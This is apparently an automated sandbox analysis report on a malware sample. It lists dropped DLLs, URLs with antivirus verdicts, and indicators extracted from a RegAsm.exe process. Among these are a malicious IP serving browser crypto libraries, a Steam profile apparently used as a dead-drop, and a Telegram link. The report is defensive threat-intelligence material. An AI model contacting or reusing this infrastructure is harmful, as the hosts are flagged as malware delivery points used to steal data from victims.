                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl0%URL Reputationsafe
                  http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                  http://www.mozilla.com/en-US/blocklist/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english0%URL Reputationsafe
                  https://mozilla.org0/0%URL Reputationsafe
                  http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                  https://store.steampowered.com/points/shop/0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                  https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                  https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
                  https://store.steampowered.com/about/0%URL Reputationsafe
                  https://help.steampowered.com/en/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english0%Avira URL Cloudsafe
                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%Avira URL Cloudsafe
                  https://95.217.240.101IDH0%Avira URL Cloudsafe
                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                  https://95.217.240.101/freebl3.dll100%Avira URL Cloudmalware
                  https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=6MtR0%Avira URL Cloudsafe
                  https://95.217.240.101/nss3.dll100%Avira URL Cloudmalware
                  https://store.steampowered.com/news/0%URL Reputationsafe
                  https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                  https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&0%Avira URL Cloudsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en0%URL Reputationsafe
                  https://store.steampowered.com/stats/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
                  https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  https://store.steampowered.com/legal/0%URL Reputationsafe
                  http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl0%URL Reputationsafe
                  https://95.217.240.101/sqlx.dll100%Sophos S4malware repository uri
                  https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en0%Avira URL Cloudsafe
                  https://store.steampowered.com/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
                  https://steamcommunity.com/login/home/?goto=profiles%2F765611996865243220%Avira URL Cloudsafe
                  https://95.217.240.101/softokn3.dlleS100%Avira URL Cloudmalware
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                  http://store.st0%Avira URL Cloudsafe
                  https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%Avira URL Cloudsafe
                  https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh0%URL Reputationsafe
                  https://95.217.240.101/softokn3.dll100%Avira URL Cloudmalware
                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20%Avira URL Cloudsafe
                  https://95.217.240.101/msvcp140.dllsS9100%Avira URL Cloudmalware
                  https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english0%Avira URL Cloudsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english0%URL Reputationsafe
                  http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
                  https://store.steampowered.com/mobile0%URL Reputationsafe
                  https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0%Avira URL Cloudsafe
                  https://95.217.240.101/freebl3.dllwT=100%Avira URL Cloudmalware
                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde74770%Avira URL Cloudsafe
                  https://steamcommunity.com/my/wishlist/0%Avira URL Cloudsafe
                  https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGAFt&a0%Avira URL Cloudsafe
                  https://95.217.240.101100%Avira URL Cloudmalware
                  https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis0%Avira URL Cloudsafe
                  https://steamcommunity.com/market/0%Avira URL Cloudsafe
                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                  https://95.217.240.101/msvcp140.dll100%Avira URL Cloudmalware
                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
                  https://steamcommunity.com/tIP0%Avira URL Cloudsafe
                  https://95.217.240.101/D100%Avira URL Cloudmalware
                  https://steamcommunity.com/discussions/0%Avira URL Cloudsafe
                  https://t.me/k0mono100%Avira URL Cloudmalware
                  https://steamcommunity.com/workshop/0%Avira URL Cloudsafe
                  https://steamcommunity.com/profiles/76561199686524322/inventory/100%Avira URL Cloudmalware
                  https://steamcommunity.com/profiles/76561199686524322/badges100%Avira URL Cloudmalware
                  https://95.217.240.101/O100%Avira URL Cloudmalware
                  https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e0%Avira URL Cloudsafe
                  https://95.217.240.101KEG0%Avira URL Cloudsafe
                  https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=L3Ed_Gybseku&l=e0%Avira URL Cloudsafe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                  https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=soQOTmUz0%Avira URL Cloudsafe
                  https://95.217.240.101/sqlx.dll100%Avira URL Cloudmalware
                  https://95.217.240.101/mozglue.dll100%Avira URL Cloudmalware
                  https://95.217.240.101/sqlx.dllI100%Avira URL Cloudmalware
                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta0%Avira URL Cloudsafe
                  https://steamcommunity.com/profiles/76561199686524322100%Avira URL Cloudmalware
                  https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg0%Avira URL Cloudsafe
                  https://95.217.240.101/msvcp140.dllyS#100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  steamcommunity.com
                  		104.102.42.29
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://95.217.240.101/nss3.dlltrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/freebl3.dlltrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/softokn3.dlltrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/msvcp140.dllfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/mozglue.dllfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/sqlx.dlltrue
                    • Sophos S4: malware repository uri
                    • Avira URL Cloud: malware
                    		unknown
                    https://steamcommunity.com/profiles/76561199686524322true
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/vcruntime140.dllfalse
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabHIEBAK.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=HIEBAK.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/?subsection=broadcastsRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=englRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101IDHRegAsm.exe, 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=6MtRRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=englishRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=englishRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=enRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.mozilla.com/en-US/blocklist/RegAsm.exe, RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://mozilla.org0/freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/login/home/?goto=profiles%2F7656119968652432276561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.valvesoftware.com/en/contact?contact-person=Translation%2RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101/softokn3.dlleSRegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://store.stRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/points/shop/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=HIEBAK.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.ecosia.org/newtab/HIEBAK.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brKJKJJJ.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101/msvcp140.dllsS9RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLKJKJJJ.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refRegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://95.217.240.101/freebl3.dllwT=RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/about/76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://help.steampowered.com/en/RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/market/RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/news/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiGCGDGH.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://95.217.240.10176561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGAFt&aRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/tIPRegAsm.exe, 00000002.00000002.2641871501.0000000000EC2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=HIEBAK.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/discussions/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/stats/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchHIEBAK.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://t.me/k0monofile.exe, 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/DRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://steamcommunity.com/profiles/76561199686524322/inventory/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://steamcommunity.com/profiles/76561199686524322/badgesRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://steamcommunity.com/workshop/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
